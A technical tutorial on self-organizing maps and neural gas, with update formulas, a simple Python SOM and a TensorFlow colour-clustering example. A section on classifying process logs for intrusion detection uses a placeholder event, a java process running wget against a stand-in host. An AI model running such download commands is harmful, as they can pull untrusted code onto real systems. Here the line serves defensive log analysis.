Catalogue
1. Introduction to SOM
2. Design details of SOM models in applications
3. Analysis of SOM capabilities
4. Self-Organizing Maps with TensorFlow
5. Feasibility design for automatic classification of anomalous process events with SOM
6. Introduction to Neural gas
7. Growing Neural Gas (GNG) Neural Network
8. Simple implementation of the "growing neural gas" artificial neural network
9. Process event embedding space visualization
1. Introduction to SOM
In 1981, Professor T. Kohonen of the University of Helsinki in Finland proposed the self-organizing feature map network, SOM for short, also called the Kohonen network. Kohonen's view was that when a neural network receives an external input pattern, it divides into different corresponding regions, each region responding to the input pattern with different characteristics, and this process happens automatically. The self-organizing feature map was proposed precisely on this view; its characteristics resemble the self-organizing properties of the human brain
A typical SOM network has two layers: the input layer models the retina that perceives external input, and the output layer models the cerebral cortex that makes the response. The figure below shows 1-D and 2-D SOM network diagrams

0x1: Description of the SOM algorithm
A SOM map consists of many neurons; each neuron comprises the following
1. A weight vector of the same dimensionality as the input data
2. An (x, y) coordinate point in a (usually, although not mandatorily) two-dimensional space
3. A name attribute naming the neuron
- Randomize the map's nodes' weight vectors: assign small random initial values to the weights of the neurons in the competitive (i.e. output) layer and normalize them; normalization helps computational performance
- Grab an input vector: fetch the input vector and normalize the data
- Traverse each node in the map: keep supplying new samples and training
- Use the Euclidean distance formula to find the similarity between the input vector and the map's node's weight vector: find the weight vector with the smallest Euclidean distance to the input vector; this step is essentially the same idea as finding cluster centers in K-means
- Track the node that produces the smallest distance (this node is the best matching unit, BMU): declare the winning unit; this neuron is the winner of this mapping round
- Update the nodes in the neighborhood of the BMU (including the BMU itself) by pulling them closer to the input vector (the neighborhood radius shrinks gradually over training; within one iteration's neighborhood, the farther a neuron is from the winner, the smaller the effect on its weights): the neighborhood of the winning unit adjusts its weights toward the input vector; the neighborhood size is set by the neighborhood function and the adjustment step by the learning rate
- Increase s and repeat from step 2 while s < λ: after each round's winner is found, shrink the neighborhood radius (so the clustering process can converge) and decrease the learning rate (to prevent over-aggregation); repeat until below the allowed values (the round count reaches its limit, or the neighborhood radius or learning rate falls below a threshold), then output the clustering result

The update formula for a neuron v with weight vector W_v(s) is

W_v(s+1) = W_v(s) + θ(u, v, s) · α(s) · (D(t) − W_v(s))

where
s is the current iteration
λ is the iteration limit
t is the index of the target input data vector in the input data set
D(t) is a target input data vector
v is the index of the node in the map
W_v is the current weight vector of node v
u is the index of the best matching unit (BMU) in the map
θ(u, v, s) is a restraint due to distance from BMU, usually called the neighborhood function, and
α(s) is a learning restraint due to iteration progress.
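Putting the formula together, here is a minimal NumPy sketch of one update step. It assumes a weight matrix W of shape (m*n, dim), a grid-coordinate array locations of shape (m*n, 2), and linearly decaying alpha/sigma schedules; all names and constants are illustrative, not from the article.

import numpy as np

def som_step(W, locations, x, s, n_iterations, alpha0=0.3, sigma0=5.0):
    decay = 1.0 - s / float(n_iterations)        # linear decay, assumes s < n_iterations
    alpha, sigma = alpha0 * decay, sigma0 * decay
    bmu = np.argmin(np.linalg.norm(W - x, axis=1))        # best matching unit
    grid_d2 = np.sum((locations - locations[bmu]) ** 2, axis=1)
    theta = np.exp(-grid_d2 / (sigma ** 2))               # Gaussian neighborhood function
    return W + (alpha * theta)[:, None] * (x - W)         # pull everyone toward the input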
SOM is a neural network model that can be used for clustering; in terms of depth it is a single-layer neural network
Unlike networks that use SGD-style error-based feedback, SOM neurons are activated by competition (competitive learning). Each neuron has a weight vector w, and an input vector x activates the neuron closest to it; this neuron is called the winner. The winner's benefit is "winner takes most": it gets to pull the surrounding neurons toward itself, so that more neurons similar to it appear around it
Training is the process of adjusting the weight parameters of the winner and its surrounding neurons. Under the influence of the training set, a winner is "elected" in every round, and the final result is a map whose whole topology is a network of clusters of mutually close "winners", looking like a traced "rubbing" of the input data
0x2: The weight-adjustment domain of the SOM
As time (the discrete training iteration count) grows, the learning rate gradually decreases; the learning rate also decreases with increasing topological distance
The winning neuron of a SOM influences its neighboring neurons from near to far, the effect gradually turning from excitation into inhibition. The learning algorithm therefore adjusts not only the winning neuron's own weight vector but also, to varying degrees, the weight vectors of the neurons around it. This adjustment can be expressed with three kinds of functions, shown as (b), (c) and (d) in the figure below

Kohonen algorithm: the basic idea is that the winning neuron influences its neighbors from near to far, with the excitatory effect on nearby neurons gradually turning into inhibition. In SOM, not only the winner adjusts its weights; the neurons around it also adjust their weight vectors to different degrees. Common adjustment schemes are the following
1. Mexican hat function: the winning node gets the largest weight adjustment, nearby nodes slightly smaller ones; the farther from the winner, the smaller the adjustment, down to zero at some distance d0; slightly farther out the adjustment turns slightly negative, and farther still it returns to zero, as in (b)
2. Top hat function: a simplification of the Mexican hat function, as in (c)
3. Chef hat function: a simplification of the top hat function, as in (d)
Rough sketches of these three profiles are given below.
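A small sketch of the three profiles, where the Mexican hat is approximated as a difference of Gaussians; all constants here are illustrative choices, not values from the article.

import numpy as np

def mexican_hat(d, sigma=2.0):
    # strong central excitation, a slightly negative ring, then back to zero
    return np.exp(-d**2 / (2 * sigma**2)) - 0.5 * np.exp(-d**2 / (8 * sigma**2))

def top_hat(d, d0=3.0, a=1.0, b=0.2):
    # constant excitation inside d0, constant mild inhibition outside
    return np.where(np.abs(d) <= d0, a, -b)

def chef_hat(d, d0=3.0, a=1.0):
    # excitation only inside d0, zero outside
    return np.where(np.abs(d) <= d0, a, 0.0)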
A neighborhood radius R is set around the winning neuron; the region it encloses is called the winning neighborhood. In the SOM learning algorithm, all neurons inside the winning neighborhood adjust their weights to different degrees according to their distance from the winner. The winning neighborhood starts out large, but shrinks as training proceeds, eventually contracting to radius zero, which physically simulates the convergence of the self-organizing clustering process
0x3: SOM map structure
All neurons are organized into a grid. The grid can be hexagonal, rectangular, even a chain or a ring; the projected network structure usually depends on how the input data is distributed in space.
SOM's job is to spread this grid (neurons on a 2-D plane) across the space the data occupies. The dynamic training process that does the spreading is:
1. The activated winner's weights move toward the input (fitting the training set), adjusting dynamically
2. The neurons around the winner move toward the winner (the self-organizing clustering process)


In the corresponding update rule w ← w + η(t) · h(i, winner) · (x − w),
η(t) is the learning rate, and
h(i, winner) is a neighborhood function: the closer two neurons are on the grid, the larger its value.
Under the control of the neighborhood function, the grid tries to preserve its topological structure while being pulled by the input data to fill the space of the input distribution

The end effect is a clustering of the data: each neuron represents one class, and that class contains the data for which the neuron wins the competition. This projection property makes SOM very well suited to low-dimensional (usually two-dimensional) visualization of high-dimensional spaces
A self-organizing map (SOM), also known as a Kohonen network, can be used to map high-dimensional data into a two-dimensional representation
Based on shared "structural similarity" in the high-dimensional input data set, SOM maps it onto a set of 2-D coordinate points, and during this mapping (dimensionality reduction) it preserves the topology of the original data: points adjacent in the high-dimensional space remain adjacent after being mapped into the SOM. Of course "adjacent" can mean different things in different spaces; for example, we can use an embedding (word-vector) model to define adjacency for the input data
0x4: Similarities and differences between SOM and K-means
While learning SOM I repeatedly felt that SOM and K-means share much in their core ideas, but there are differences too
1. K-means can be pictured as a very active person shuttling through a crowd of people of different types, updating his own center position each time he recognizes his own kind, over and over. SOM is different: it is like a magnet; each time it finds one of its own kind it calls out to all similar ones within a certain range, pulling them toward itself (the farther away, the weaker the call). Intuitively, SOM makes more total moves than K-means, which suggests its clustering "imprint" is somewhat better
2. There is also a similarity: the high-dimensional point vectors in K-means correspond to the neurons' weight vectors in SOM (a SOM is made of neurons); I think they are essentially the same. The difference is that SOM can additionally use the neurons' weight vectors to project high-dimensional points onto low-dimensional (2-D) coordinates, which gives SOM its dimensionality-reduction property
3. A self-organizing map with few nodes behaves much like the k-means clustering algorithm, but larger self-organizing maps (with more neuron nodes) rearrange the data in a way that is fundamentally topological
4. As we know, SOM is unsupervised learning: it only looks for topological patterns in the input data set and sorts them into a given number of classes. The most interesting part of SOM, though, is that by using neuron weight vectors as an intermediate quantity, this unsupervised learning becomes "model-izable": the weight model obtained without supervision is not discarded after one use but can be reused for future classification/prediction
5. How well SOM's unsupervised clustering works depends to some degree on the training samples themselves (whether they contain sufficiently rich patterns)
6. Note, however, that SOM's weights are still not quite the same as the model weights obtained by truly supervised learning (e.g. CNN). A SOM model is more sensitive to its training set: it is purely a fit to the topological structure found in the training data, and SOM itself cannot guarantee generalization. The burden of generalization falls on the training-set collection phase: we need to gather training samples of as many types as possible, so the set contains sufficiently rich patterns
7. K-Means requires fixing the number of classes, i.e. the value of K, in advance. SOM does not; some nodes in the hidden layer may end up with no input data belonging to them. For this reason K-Means is more sensitive to initialization
8. After finding the most similar class for an input, K-means updates only that class's parameters, whereas SOM also updates neighboring nodes. So K-means is more affected by noisy data, while SOM's accuracy may be lower than K-means (precisely because the neighboring nodes are updated too)
9. SOM visualizes better: elegant topological maps
0x5: SOM Training && Classification
1. training: the SOM weight vectors obtained from the training samples play the same role as the weight parameters trained in a DNN
2. mapping: "mapping" automatically classifies a new input vector. Using the trained weight parameters, new input data is classified (classification); the weights obtained without supervision act like a classification model from supervised learning and can be used to predict
0x6: Conceptual example code
There are 8 input samples, each composed of two feature values (x, y), shown on the 2-D coordinate system (x horizontal, y vertical) in the figure below

We want the SOM algorithm to split the input nodes above into two classes, i.e. obtain two neurons; a neuron's weights can be read, intuitively, as a vector of the same dimensionality as the input data
1. Each input sample has 2 features (the x and y coordinate values), and there are 8 input samples, so the input layer has 8 nodes
2. Since the goal is a split into two classes, we define two output nodes, each with 2 features (x, y)
3. Randomly initialize the two output nodes W according to the rules above
4. for each input node i in INPUT {
       for each output node w in W {
           compute the Euclidean distance between the current input node i and output node w;
       }
       take the output node w closest to the current input node i (smallest Euclidean distance) as the winner;
       adjust w's feature values toward the current input node (a threshold (step size) controls the magnitude);
   }
   decay the threshold (step size);
5. Repeat step 4 until the output nodes W stabilize (the threshold (step size) becomes very small)
code
# -*- coding:utf-8 -*-
# som example algorithm, by 自由爸爸
import random
import math

input_layer = [[39, 281], [18, 307], [24, 242], [54, 333],
               [322, 35], [352, 17], [278, 22], [382, 48]]  # input nodes
category = 2

class Som_simple_zybb():
    def __init__(self, category):
        self.input_layer = input_layer  # input samples
        self.output_layer = []  # output data
        self.step_alpha = 0.5  # step size, initialized to 0.5
        self.step_alpha_del_rate = 0.95  # step-size decay rate
        self.category = category  # number of classes
        self.output_layer_length = len(self.input_layer[0])  # dimensionality of each output node: 2
        self.d = [0.0] * self.category

    # initialize output_layer
    def initial_output_layer(self):
        for i in range(self.category):
            self.output_layer.append([])
            for _ in range(self.output_layer_length):
                self.output_layer[i].append(random.randint(0, 400))

    # core logic of the som algorithm:
    # compute the distances between one input sample and all output nodes, stored in self.d
    def calc_distance(self, a_input):
        self.d = [0.0] * self.category
        for i in range(self.category):
            w = self.output_layer[i]
            for j in range(len(a_input)):
                self.d[i] += math.pow((a_input[j] - w[j]), 2)  # skip the square root

    # return the index of the minimum value in a list
    def get_min(self, a_list):
        min_index = a_list.index(min(a_list))
        return min_index

    # move the output node toward the current input (update every dimension of the node, here x and y)
    def move(self, a_input, min_output_index):
        for i in range(len(self.output_layer[min_output_index])):
            # here we ignore the decay of the update rate with distance from the winner neuron
            self.output_layer[min_output_index][i] = self.output_layer[min_output_index][i] + \
                self.step_alpha * (a_input[i] - self.output_layer[min_output_index][i])

    # som logic (one pass)
    def train(self):
        for a_input in self.input_layer:
            self.calc_distance(a_input)
            min_output_index = self.get_min(self.d)
            self.move(a_input, min_output_index)

    # loop som_train until stable
    def som_looper(self):
        generate = 0
        while self.step_alpha >= 0.0001:  # this runs for about 167 generations
            self.train()
            generate += 1
            print("generation: {0}  step size: {1}  output nodes: {2}".format(
                generate, self.step_alpha, self.output_layer))
            self.step_alpha *= self.step_alpha_del_rate  # decay the step size

if __name__ == '__main__':
    som_zybb = Som_simple_zybb(category)
    som_zybb.initial_output_layer()
    som_zybb.som_looper()

Relevant Link:
http://www.pymvpa.org/installation.html
http://www.pymvpa.org/examples/som.html
https://www.zhihu.com/question/28046923
http://blog.csdn.net/xuesen_lin/article/details/6020602
http://blog.csdn.net/xbinworld/article/details/50826892
https://en.wikipedia.org/wiki/Self-organizing_map
http://www.ziyoubaba.com/archives/606#comment-148
http://www.cnblogs.com/sylvanas2012/p/5117056.html
http://blog.sciencenet.cn/blog-468005-883687.html
http://blog.csdn.net/wangxin110000/article/details/22150557
2. Design details of SOM models in applications
0x1: Output layer design
The number of output-layer neurons is related to the number of classes in the training set, but in practice we often cannot know clearly how many classes there are. If the number of neuron nodes is smaller than the number of classes, the network cannot distinguish all the patterns, and training will inevitably merge similar pattern classes into one. Conversely, if there are more neuron nodes than classes, the partition may become too fine, or "dead nodes" may appear: nodes that never win during training and lie far from the other winning nodes, so their weights never get updated.
Generally, if we have no firm knowledge of the number of classes, it is better to start with more nodes, so the topology of the samples is mapped well, and trim the output nodes later if the classification turns out too fine. The "dead node" problem can usually be solved by re-initializing the weights
0x2: Design of the output-node layout
How the output nodes are arranged depends on the needs of the application, and the layout should reflect the physical meaning of the problem as directly as possible. For travelling-route problems, for example, a 2-D plane is intuitive; for generic classification, one output node can represent one pattern class, and a 1-D line array is clear in meaning and simple in structure
0x3: Weight initialization
The basic principle is to make the initial weight positions overlap the rough distribution region of the input samples as much as possible, avoiding a large number of initial "dead nodes"; this matches the weight-initialization requirement of K-means
1. A simple and practical method is to randomly draw m (the number of neurons) input samples from the training set as initial weights, so the initial weights directly correspond to m input points
2. Another workable method is to first compute the center vector of all samples and superimpose small random numbers on it as the initial weight vectors; the initial weight positions can also be placed inside the sample cloud (picking points near the center)
Both initialization methods embody the same "fit as much as possible" idea; a small sketch of the two follows
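A minimal sketch of the two initialization strategies, assuming X is an (n_samples, dim) array of training samples and m the number of neurons; the function names are illustrative.

import numpy as np

def init_from_samples(X, m, rng=np.random.default_rng(0)):
    idx = rng.choice(len(X), size=m, replace=False)   # m random training samples as weights
    return X[idx].astype(float)

def init_from_center(X, m, noise=0.01, rng=np.random.default_rng(0)):
    center = X.mean(axis=0)                           # center vector of all samples
    return center + noise * rng.standard_normal((m, X.shape[1]))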
0x4: Design of the winning neighborhood
The design principle for the winning neighborhood is to keep shrinking it, so that the weight vectors of adjacent output-plane neurons end up both distinct and considerably similar, guaranteeing that when the winning node responds maximally to some pattern class, its neighborhood nodes also respond strongly ("birds of a feather flock together"). The neighborhood shape can be square, hexagonal or rhombic. The neighborhood size is expressed by its radius; there is currently no general mathematical method for designing r(t), which is usually chosen by experience. Two typical forms (written here in a standard shape consistent with the constants defined below) are

r(t) = C1 · (1 − t/T)        r(t) = C1 · B1^(−t/T)

where C1 is a positive constant related to the number of output-layer nodes, B1 is a constant greater than 1, and T is a preselected maximum number of training iterations; overall, both forms are gradually decaying curves; a tiny code sketch follows
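A small sketch of the two decay schedules above; C1, B1 and T are illustrative constants, not values from the article.

def radius_linear(t, C1=10.0, T=1000):
    return C1 * (1.0 - float(t) / T)

def radius_exponential(t, C1=10.0, B1=2.0, T=1000):
    return C1 * B1 ** (-float(t) / T)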
0x5: Learning rate design
At the start of training the learning rate can take a larger value and then drop fairly quickly, which helps capture the rough topological structure of the input vectors early; afterwards the learning rate decays slowly toward 0 at small values, allowing the weights to be fine-tuned to match the sample distribution of the input space; a sketch of such a schedule follows
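A hedged sketch of such a two-phase schedule: a fast exponential drop early on, then a slow taper to 0 at t = T. The constants are illustrative, not from the article.

import math

def learning_rate(t, T, alpha0=0.9, k=5.0):
    return alpha0 * math.exp(-k * float(t) / T) * (1.0 - float(t) / T)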
Relevant Link:
http://blog.csdn.net/xbinworld/article/details/50890900
3. Analysis of SOM capabilities
1. Order-preserving mapping: maps the sample pattern classes of the input space onto the output layer in an orderly way
2. Data compression: projects high-dimensional samples into a lower-dimensional space while keeping the topological structure unchanged; SOM has a clear advantage here. Whatever the dimensionality of the input sample space, its patterns get a response in some region of the SOM output layer. After training, samples that are close in the high-dimensional input space also produce responses at nearby output positions
3. Feature extraction: a mapping from the high-dimensional sample space to a low-dimensional space, where the SOM output layer acts as the low-dimensional feature space
Depending on whether the SOM's input training data carries labels, SOM can to some extent take on characteristics of supervised learning; we discuss the two cases separately
0x1: Training set without labels
For such a training set, each sample's label is unknown in advance. All we can do is set the number of SOM neurons and let the SOM automatically cluster the data into the specified number of classes. Some neurons may become dead nodes (no input sample maps to them), and the neurons obtained by classification carry only an index, not label information; labeling the classified sample sets requires manual work
0x2: Training set with labels
This is the part I find most magical: it made me feel the gulf between supervised and unsupervised learning is not 100% real. Whether learning is supervised or unsupervised does not depend only on the model; sometimes it also depends on the samples and how they are used. The rough workflow is as follows (a sketch of the voting step comes after the list)
1. Given a labeled training set, split it 8:2 for cross-validation
2. Run SOM clustering exactly as in the unlabeled case
3. After each epoch, increment the match count, on the winner neuron, of the corresponding input sample's label. Note: different input vectors in the training set may map to the same neuron node, in which case the node gets tagged with several labels. We then "vote", taking the label with the most hits; this may introduce false positives, but that is unavoidable, similar to the K-means situation where a point is equidistant from several centers (the question of which class a grey-zone point belongs to)
4. After training on all input samples, run a vote over each mapped neuron node's label list (since one neuron node may carry several labels) and take the most frequent label as the final one. This step can be understood as wrapping the unsupervised classification result in a supervised layer using the labels, giving the algorithm supervised characteristics
5. When validating on the test set, use the SOM model's predict capability to get the predicted label and compare it against the test labels to estimate accuracy
6. In later predictions the model can output labels for input data directly, but its generalization is weak: it only recognizes data with known (or similar-to-known) labels and cannot label unknown kinds
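A minimal sketch of the majority-vote labeling of SOM neurons described in steps 3-4, assuming a function bmu(x) that returns the winning neuron index for a sample; all names are illustrative.

from collections import Counter, defaultdict

def label_neurons(samples, labels, bmu):
    hits = defaultdict(Counter)
    for x, y in zip(samples, labels):
        hits[bmu(x)][y] += 1                  # count label hits per winner neuron
    return {u: c.most_common(1)[0][0] for u, c in hits.items()}  # vote per neuron

def predict(x, neuron_label, bmu):
    return neuron_label.get(bmu(x))           # None for dead / unlabeled neurons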
4. Self-Organizing Maps with TensorFlow
Using TensorFlow, we run SOM self-organizing clustering on a set of points in 3-D RGB space. Training "learns" the topology of the RGB space and yields a weight-vector model, which can later be used to predict the class of new points in the RGB space

# -*- coding: utf-8 -*-
import tensorflow as tf
import numpy as np

class SOM(object):
    """
    2-D Self-Organizing Map with Gaussian Neighbourhood function
    and linearly decreasing learning rate.
    """

    # To check if the SOM has been trained
    _trained = False

    def __init__(self, m, n, dim, n_iterations=100, alpha=None, sigma=None):
        """
        Initializes all necessary components of the TensorFlow Graph.
        1. m X n are the dimensions of the SOM.
        2. 'n_iterations' should be an integer denoting the number of iterations undergone while training.
        3. 'dim' is the dimensionality of the training inputs.
        4. 'alpha' is a number denoting the initial time(iteration no)-based learning rate. Default value is 0.3
        5. 'sigma' is the the initial neighbourhood value, denoting the radius of influence of the BMU while training.
           By default, its taken to be half of max(m, n).
        """
        # Assign required variables first
        self._m = m
        self._n = n
        if alpha is None:
            alpha = 0.3
        else:
            alpha = float(alpha)
        if sigma is None:
            sigma = max(m, n) / 2.0
        else:
            sigma = float(sigma)
        self._n_iterations = abs(int(n_iterations))

        ##INITIALIZE GRAPH
        # A TensorFlow computation, represented as a dataflow graph.
        self._graph = tf.Graph()

        ##POPULATE GRAPH WITH NECESSARY COMPONENTS
        # overrides the current default graph for the lifetime of the context:
        with self._graph.as_default():
            ##VARIABLES AND CONSTANT OPS FOR DATA STORAGE
            # Randomly initialized weightage vectors for all neurons, stored together as a matrix Variable of size [m*n, dim]
            # the number of neurons is fixed at initialization, representing how many classes we want to cluster the input
            # into; the weight dimensionality equals that of the input data
            self._weightage_vects = tf.Variable(tf.random_normal([m * n, dim]))

            # Matrix of size [m*n, 2] for SOM grid locations of neurons
            # the SOM neurons live on a 2-D m*n grid
            self._location_vects = tf.constant(np.array(list(self._neuron_locations(m, n))))

            ##PLACEHOLDERS FOR TRAINING INPUTS
            # We need to assign them as attributes to self, since they will be fed in during training
            # The training vector
            self._vect_input = tf.placeholder("float", [dim])
            # Iteration number
            self._iter_input = tf.placeholder("float")

            ##CONSTRUCT TRAINING OP PIECE BY PIECE
            # Only the final, 'root' training op needs to be assigned as an attribute to self,
            # since all the rest will be executed automatically during training

            # To compute the Best Matching Unit given a vector: basically calculates the Euclidean distance between
            # every neuron's weightage vector and the input, and returns the index of the neuron which gives the least value
            bmu_index = tf.argmin(tf.sqrt(tf.reduce_sum(
                tf.pow(tf.subtract(self._weightage_vects, tf.stack(
                    [self._vect_input for i in range(m * n)])), 2), 1)), 0)

            # This will extract the location of the BMU based on the BMU's index
            slice_input = tf.pad(tf.reshape(bmu_index, [1]), np.array([[0, 1]]))
            bmu_loc = tf.reshape(tf.slice(self._location_vects, slice_input,
                                          tf.constant(np.array([1, 2]))), [2])

            # To compute the alpha and sigma values based on iteration number
            learning_rate_op = tf.subtract(1.0, tf.div(self._iter_input, self._n_iterations))
            _alpha_op = tf.multiply(alpha, learning_rate_op)
            _sigma_op = tf.multiply(sigma, learning_rate_op)

            # Construct the op that will generate a vector with learning rates for all neurons,
            # based on iteration number and location wrt BMU.
            bmu_distance_squares = tf.reduce_sum(tf.pow(tf.subtract(
                self._location_vects, tf.stack(
                    [bmu_loc for i in range(m * n)])), 2), 1)
            neighbourhood_func = tf.exp(tf.negative(tf.div(tf.cast(
                bmu_distance_squares, "float32"), tf.pow(_sigma_op, 2))))
            # the influence of the winning neighborhood decays exponentially with distance from the BMU
            learning_rate_op = tf.multiply(_alpha_op, neighbourhood_func)

            # Finally, the op that will use learning_rate_op to update the weightage vectors of all neurons
            # based on a particular input
            # the BMU and its surrounding neuron nodes all update their weights (i.e. move toward the input)
            learning_rate_multiplier = tf.stack([tf.tile(tf.slice(
                learning_rate_op, np.array([i]), np.array([1])), [dim]) for i in range(m * n)])
            weightage_delta = tf.multiply(
                learning_rate_multiplier,
                tf.subtract(tf.stack([self._vect_input for i in range(m * n)]), self._weightage_vects))
            new_weightages_op = tf.add(self._weightage_vects, weightage_delta)
            self._training_op = tf.assign(self._weightage_vects, new_weightages_op)

            ##INITIALIZE SESSION
            self._sess = tf.Session()

            ##INITIALIZE VARIABLES
            init_op = tf.global_variables_initializer()
            self._sess.run(init_op)

    def _neuron_locations(self, m, n):
        """
        Yields one by one the 2-D locations of the individual neurons in the SOM.
        """
        # Nested iterations over both dimensions to generate all 2-D locations in the map
        for i in range(m):
            for j in range(n):
                yield np.array([i, j])

    def train(self, input_vects):
        """
        Trains the SOM.
        'input_vects' should be an iterable of 1-D NumPy arrays with dimensionality as provided
        during initialization of this SOM.
        Current weightage vectors for all neurons(initially random) are taken as starting conditions for training.
        """
        # Training iterations
        for iter_no in range(self._n_iterations):
            # Train with each vector one by one
            for input_vect in input_vects:
                self._sess.run(self._training_op,
                               feed_dict={self._vect_input: input_vect,
                                          self._iter_input: iter_no})

        # Store a centroid grid for easy retrieval later on
        centroid_grid = [[] for i in range(self._m)]
        self._weightages = list(self._sess.run(self._weightage_vects))
        self._locations = list(self._sess.run(self._location_vects))
        for i, loc in enumerate(self._locations):
            centroid_grid[loc[0]].append(self._weightages[i])
        self._centroid_grid = centroid_grid

        self._trained = True

    def get_centroids(self):
        """
        Returns a list of 'm' lists, with each inner list containing the 'n' corresponding
        centroid locations as 1-D NumPy arrays.
        """
        if not self._trained:
            raise ValueError("SOM not trained yet")
        return self._centroid_grid

    def map_vects(self, input_vects):
        """
        Maps each input vector to the relevant neuron in the SOM grid.
        'input_vects' should be an iterable of 1-D NumPy arrays with dimensionality as provided
        during initialization of this SOM.
        Returns a list of 1-D NumPy arrays containing (row, column) info for each input vector
        (in the same order), corresponding to mapped neuron.
        """
        if not self._trained:
            raise ValueError("SOM not trained yet")

        to_return = []
        for vect in input_vects:
            min_index = min([i for i in range(len(self._weightages))],
                            key=lambda x: np.linalg.norm(vect - self._weightages[x]))
            to_return.append(self._locations[min_index])
        return to_return


# For plotting the images
from matplotlib import pyplot as plt

if __name__ == '__main__':
    # Training inputs for RGBcolors
    colors = np.array(
        [[0., 0., 0.],
         [0., 0., 1.],
         [0., 0., 0.5],
         [0.125, 0.529, 1.0],
         [0.33, 0.4, 0.67],
         [0.6, 0.5, 1.0],
         [0., 1., 0.],
         [1., 0., 0.],
         [0., 1., 1.],
         [1., 0., 1.],
         [1., 1., 0.],
         [1., 1., 1.],
         [.33, .33, .33],
         [.5, .5, .5],
         [.66, .66, .66]])
    # classify a labeled trainning set
    color_names = \
        ['black', 'blue', 'darkblue', 'skyblue',
         'greyblue', 'lilac', 'green', 'red',
         'cyan', 'violet', 'yellow', 'white',
         'darkgrey', 'mediumgrey', 'lightgrey']

    # Train a 20x30 SOM with 400 iterations, input data set is 3 dim
    som = SOM(m=20, n=30, dim=3, n_iterations=400)
    som.train(colors)

    # Get output grid
    # after training, the 2-D coordinates of the SOM neuron nodes and their weight vectors are saved
    image_grid = som.get_centroids()

    # Map colours to their closest neurons
    # associate each input with a neuron via the topological match between input and weights,
    # in preparation for labeling the classes obtained by SOM clustering later
    mapped = som.map_vects(colors)

    # Plot
    plt.imshow(image_grid)
    plt.title('Color SOM')
    for i, m in enumerate(mapped):
        # color_names[i]: the label of this input
        # m: the 2-D coordinates of the corresponding neuron
        plt.text(m[1], m[0], color_names[i], ha='center', va='center',
                 bbox=dict(facecolor='white', alpha=0.5, lw=0))
    plt.show()

TensorFlow self-organized the labeled training set into clusters; the model built by this training run can likewise be saved to disk with pickle and shared with others, as sketched below
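A hedged sketch of persisting the trained state with pickle, assuming the som object from the example above; saving the learned NumPy arrays rather than the TensorFlow session keeps it simple.

import pickle

with open('som_model.pkl', 'wb') as f:
    # the learned per-neuron weight vectors and grid locations are enough to map new inputs
    pickle.dump({'weightages': som._weightages, 'locations': som._locations}, f)

with open('som_model.pkl', 'rb') as f:
    model = pickle.load(f)   # reuse model['weightages'] later for mapping / prediction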
Relevant Link:
http://iamthevastidledhitchhiker.github.io/2016-03-11-TF_SOM
https://codesachin.wordpress.com/2015/11/28/self-organizing-maps-with-googles-tensorflow/
https://pypi.python.org/pypi/kohonen
https://media.readthedocs.org/pdf/kohonen/latest/kohonen.pdf
5. SOM在異常進程事件中自動分類的可行性設計
抽取一批系統進程全量日志
將其映射到emberding詞向量空間中,每個事件padding/cutting到200byte長度,得到一組高維空間向量數據集
通過SOM得到一個聚類投影權值模型,用100個神經元,直接投影到1維,因為我們的目的僅僅是為了分類,並沒有空間上的物理需求
然后根據得到的模型對全量日志進行classification,給每類一個tag
人工介入分析每一類進程事件,探查是否存在惡意入侵跡象
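A hedged sketch of the pipeline above using MiniSom (a third-party SOM library, not the one linked below); the embedding step is stubbed to a simple byte encoding, and all names, the placeholder log line and the 200-byte width are illustrative.

import numpy as np
from minisom import MiniSom

def embed(event, width=200):
    # pad/cut to 200 bytes, then scale to [0, 1]
    v = np.frombuffer(event.encode()[:width].ljust(width, b'\0'), dtype=np.uint8)
    return v / 255.0

events = ["/usr/bin/java--->wget http://example.test/x"]   # placeholder process logs
X = np.array([embed(e) for e in events])

som = MiniSom(1, 100, X.shape[1])          # 100 neurons on a 1-D grid
som.train_random(X, 1000)
tags = [som.winner(x)[1] for x in X]       # one tag (neuron index) per event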
Relevant Link:
https://github.com/pybrain/pybrain
6. Introduction to Neural gas
Neural gas is an artificial neural network, inspired by the self-organizing map and introduced in 1991 by Thomas Martinetz and Klaus Schulten. The neural gas is a simple algorithm for finding optimal data representations based on feature vectors. The algorithm was coined "neural gas" because of the dynamics of the feature vectors during the adaptation process, which distribute themselves like a gas within the data space.
It is applied where data compression or vector quantization is an issue, for example
1. speech recognition
2. image processing
3. pattern recognition
4. as a robustly converging alternative to k-means clustering, it is also used for cluster analysis
0x1: Algorithm
Given a probability distribution P(x) of data vectors x and a finite number of feature vectors w_i, i = 1, ..., N.
With each time step t a data vector randomly chosen from P is presented. Subsequently, the distance order of the feature vectors to the given data vector x is determined. Let i_0 denote the index of the closest feature vector, i_1 the index of the second closest feature vector, and so on, with i_{N-1} the index of the feature vector most distant to x. Then each feature vector with rank k = 0, ..., N-1 is adapted according to

w_{i_k} ← w_{i_k} + ε · e^(−k/λ) · (x − w_{i_k})

with ε as the adaptation step size (analogous to a learning rate) and λ as the so-called neighborhood range (a neighborhood window function). ε and λ are reduced with increasing t (the adaptation parameters decay over time). After sufficiently many adaptation steps the feature vectors cover the data space with minimum representation error.
The adaptation step of the neural gas can be interpreted as gradient descent on a cost function. By adapting not only the closest feature vector but all of them with a step size decreasing with increasing distance order (not only the neuron closest to the input updates its weights; neurons further down the distance ranking also receive a decaying share of the update), a much more robust convergence of the algorithm can be achieved compared to (online) k-means clustering. The neural gas model does not delete a node and also does not create new nodes. A minimal code sketch of one adaptation step follows.
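A minimal NumPy sketch of one neural-gas adaptation step per the formula above; W is an (N, dim) array of feature vectors, and eps/lam are the already-decayed ε and λ for the current time step.

import numpy as np

def neural_gas_step(W, x, eps, lam):
    order = np.argsort(np.linalg.norm(W - x, axis=1))   # units sorted by distance to x
    k = np.empty(len(W)); k[order] = np.arange(len(W))  # k[i] = distance rank of unit i
    return W + eps * np.exp(-k / lam)[:, None] * (x - W)  # rank-decayed pull toward x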
Understood at its essence:
This is a local weight-update algorithm. More generally, unsupervised learning tends toward local feature learning: knowing nothing about the global picture before training, it can only follow a locally optimal principle, learning the topological patterns in the data from near to far. Supervised learning is the opposite: it knows the global overview of the data from the start, so every step surveys the whole data set and pushes the model weights toward the globally optimal target
Because of this difference, unsupervised learning is more like topology learning, while supervised learning is more like learning a global strategy
Relevant Link:
https://en.wikipedia.org/wiki/Neural_gas
7. Growing Neural Gas (GNG) Neural Network
The Growing Neural Gas (GNG) Neural Network belongs to the class of Topology Representing Networks (TRNs). It can learn in both supervised and unsupervised modes.
0x1: Hebbian theory
